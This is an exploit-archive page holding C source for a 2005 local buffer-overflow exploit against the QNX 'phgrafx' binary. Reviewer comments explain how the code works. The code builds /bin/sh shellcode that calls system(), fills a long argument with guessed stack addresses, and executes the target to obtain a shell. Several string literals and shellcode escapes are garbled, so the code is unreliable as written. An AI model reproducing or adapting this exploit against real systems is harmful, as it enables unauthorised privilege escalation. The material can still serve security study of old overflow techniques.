



2005-11-30 QNX Realtime Operating System (RTOS) "phgrafx" Local Buffer Overflow Exploit
Rated as : Moderate Risk 

/* 
* minervini_at_neuralnoise.com (c) 2005, all rights reserved. 
* sample exploit for phgrafx on QNX 6.3.0 x86 
* 
* tested on: QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86 
*/

#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <err.h>

#ifndef _PATH
# define _PATH ("/usr/photon/bin/phgrafx") /* target binary handed to execl() in main(); the #ifndef guard lets it be overridden at compile time */
#endif

#ifndef _RET_INIT
# define _RET_INIT (864) /* byte offset inside buf where main() stops the payload and starts repeating the guessed stack address (see the loops in main()) */
#endif
/* NOTE(review): identifiers beginning with '_' + uppercase are reserved
 * for the implementation in C; the names above are kept for fidelity. */

/* thanks to my friend pi3, who suggested calling a libc 
* function to make the shellcode much shorter than it was */

/* Payload copied into buf by main(). The trailing comments are the
 * author's annotation of each intended x86 instruction; the sequence
 * ends in a call through %ebx, whose immediate (the 0xDEADBEEF
 * placeholder at byte offset 0xf) main() overwrites with the address
 * it resolves for system().
 * NOTE(review): as rendered here the escape prefixes are missing
 * ("x31xc0" rather than escaped bytes), so the literal is plain ASCII
 * and does not encode the annotated bytes. This looks like
 * transcription damage and is left untouched. */
char scode[] = "x31xc0" // xor %eax,%eax 
"x50" // push %eax 
"x68x2fx2fx73x68" // push $0x68732f2f 
"x68x2fx62x69x6e" // push $0x6e69622f 
"x54" // push %esp 
"xbbxEFxBExADxDE" // mov $0xDEADBEEF,%ebx 
"xffxd3"; // call *%ebx

/* Intended to return the caller's current stack pointer on 32-bit x86:
 * the inline asm copies %esp into %eax and the function relies on %eax
 * being the return register of that ABI. There is no C return
 * statement, so in standard C the returned value is undefined and this
 * only works under specific compiler/ABI assumptions. main() uses the
 * result, minus an optional offset, as its guess for where buf will
 * land on the target's stack. */
unsigned long get_sp (void) { 
__asm__ ("movl %esp, %eax");
}

/*
 * Builds a single oversized argv entry and exec()s the target with it.
 * Layout of buf (1032 bytes, zero-filled):
 *   [0, _RET_INIT - slen)          filler bytes 'A'
 *   [_RET_INIT - slen, _RET_INIT)  scode, patched with the address of system()
 *   [_RET_INIT, 1024)              the guessed stack address, repeated
 *   [1024, 1032)                   left zero, which terminates the string
 * argv[1], if present, is subtracted from get_sp() to tune that guess.
 *
 * Returns -1, before building anything, if the resolved address of
 * system() contains a byte the author says the target truncates.
 * Otherwise execl() replaces the process; 0 is returned only if execl()
 * itself fails, and that failure is not reported.
 *
 * NOTE(review): strlen(), memcpy() and memset() are used but <string.h>
 * is not among the includes shown above, so this relies on implicit
 * declarations. The technique presumes the target copies this argument
 * into a fixed-size stack buffer without a length check, that the stack
 * address is predictable, and that the stack is executable; bounds
 * checking in the target, stack canaries, ASLR and a non-executable
 * stack each break one of those assumptions.
 */
int main (int argc, char **argv) { 

int i, slen = strlen (scode), offset = 0; 
long ptr, *lptr, addr; 
char *buf; 
void *handle; 

/* Resolve system() in this process's own libc image; the author assumes
 * the target maps libc at the same address. Neither the handle nor the
 * dlsym() result is checked, and handle is never dlclose()d (moot once
 * execl() succeeds). */
handle = dlopen (NULL, RTLD_LAZY); 
addr = (long) dlsym (handle, "system"); 

/* Bail out if any of the four address bytes is NUL, TAB or LF: per the
 * message below, the target is believed to drop those bytes from its
 * argument, which would corrupt the patched address. */
for (i = 0; i < 4; i++) { 
char temp = (*((char *) &addr + i) & 0xff); 
if (temp == 0x00 || temp == 0x09 || temp == 0x0a) { 
/* NOTE(review): as rendered, this literal is wrapped across physical
 * lines and its newline escapes appear as a bare "n"; that looks like
 * transcription damage and is left untouched. */
puts 
("currently system()'s address contains bytes like 0x00, 0x09 or
0x0a, so it probably
won't work since" 
" the application seems to truncate those bytes. BTW you can rely on
functions like
exec*(), spawn*()" 
" or MsgSend*() to get this working.n" 
"more at
http://www.qnx.org/developers/docs/momentics621_docs/neutrino/lib_ref/");

return (-1); 
} 
} 

/* Overwrite the 0xDEADBEEF placeholder (byte offset 0xf of scode, the
 * operand of the annotated mov $imm32,%ebx) with the resolved address. */
memcpy((char *)&scode + 0xf, &addr, 4); 

/* Optional stack-address adjustment. strtoul() errors are not detected
 * (endptr is NULL, errno is not checked), so unparsable input yields 0. */
if (argc > 1) 
offset = strtoul(argv[1], NULL, 0); 

if (!(buf = (char *) malloc(1032))) 
err(1, "malloc()"); 

memset(buf, 0, 1032); 

/* Filler up to the start of scode; the author annotates 'A' (0x41) as
 * the single-byte x86 instruction inc %ecx. */
for (i = 0; i < (_RET_INIT - slen); i++) 
buf[i] = 'A'; // inc %ecx 

/* NOTE(review): the format strings here and below end in a bare "n",
 * apparently a newline escape lost in transcription; left as-is. */
printf("shellcode length: %dn", slen); 

/* scode occupies [_RET_INIT - slen, _RET_INIT) so that it ends exactly
 * where the repeated address begins. */
for (i = (_RET_INIT - slen); i < _RET_INIT; i++) 
buf[i] = scode[i - (_RET_INIT - slen)]; 

lptr = (long *) (buf + _RET_INIT); 

/* Guessed address of buf on the target's stack: this process's %esp
 * (see get_sp()) minus the user-supplied offset. */
printf("address: 0x%lxn", ptr = (get_sp () - offset)); 

/* Fill [_RET_INIT, 1024) with that address, one long at a time. The
 * (int) cast narrows ptr; on the 32-bit x86 target int and long are
 * both 32 bits, so it changes nothing there. */
for (i = 0; i < ((1024 - _RET_INIT) / 4); i++) 
*(lptr + i) = (int) ptr; 

/* Launch the target with buf as its only argument. If execl() returns
 * it has failed, but no error is reported and 0 is still returned.
 * buf is not freed; on success the process image is replaced anyway. */
execl(_PATH, "phgrafx", buf, NULL); 

return (0);
} 
securitydot.net - 2005-11-30
